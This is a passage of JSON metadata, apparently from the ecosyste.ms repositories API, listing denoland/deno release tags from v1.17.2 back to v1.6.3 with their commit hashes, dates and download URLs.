/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"pu